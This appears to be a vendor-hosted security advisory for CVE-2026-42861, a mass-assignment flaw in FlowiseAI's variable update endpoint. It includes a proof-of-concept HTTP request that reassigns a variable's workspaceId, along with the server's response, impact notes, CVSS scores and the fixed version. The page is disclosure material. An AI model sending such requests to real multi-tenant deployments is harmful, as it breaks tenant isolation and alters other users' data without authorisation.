CVE

CVE-2026-42861

FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment

CVE

CVE-2026-42861

FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment

Summary

A Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.

The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.

Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.

This behavior may break tenant isolation in multi-workspace environments.

Details

The endpoint responsible for updating variables:

PUT /api/v1/variables/{variableId}

accepts a JSON request body containing the variable definition.

However, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.

Server-controlled fields that can be manipulated include:

workspaceId
createdDate
updatedDate

These fields appear to be directly mapped to the database entity without strict input validation or authorization checks.

For example, the following request body was accepted by the server:

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

The server accepted the attacker-controlled workspaceId and metadata fields and persisted them.

PoC

Request

PUT /api/v1/variables/<VARIABLE_ID>
Content-Type: application/json
{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Response

{
  "id": "0a2b9f61-4a97-4ff8-b80d-00275ed18674",
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2026-03-06T18:05:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

This confirms that the backend accepts and persists attacker-controlled internal properties.

Impact

This vulnerability allows authenticated users to manipulate internal attributes of variable resources.

Possible impacts include:

Cross-workspace reassignment of variables (workspaceId)
Unauthorized modification of metadata (createdDate, updatedDate)
Potential tenant isolation bypass in multi-workspace deployments

In multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.

Package Versions Affected

No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading

Detect compatible fix

Apply safe remediation

Fix with a single pull request

CVSS Version

7.6

4.0

CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Related Resources

No items found.

References

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6fw7-3q8r-m5vj, https://nvd.nist.gov/vuln/detail/CVE-2026-42861, https://github.com/FlowiseAI/Flowise, https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2

Severity

9.6

CVSS Score

Basic Information

Ecosystem

Base CVSS

9.6

EPSS Probability

0.0008%

EPSS Percentile

0.23871%

Introduced Version

Fix Available

3.1.2

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.

Fix Without Upgrading

Get a Demo

Let's Patch It!

CVE-2026-42861

CVE-2026-42861

Summary

Details

PoC

Impact

Package Versions Affected

Automatically patch vulnerabilities without upgrading

CVSS Version

Related Resources

References

Severity

9.6

Basic Information

Fix Critical Vulnerabilities Instantly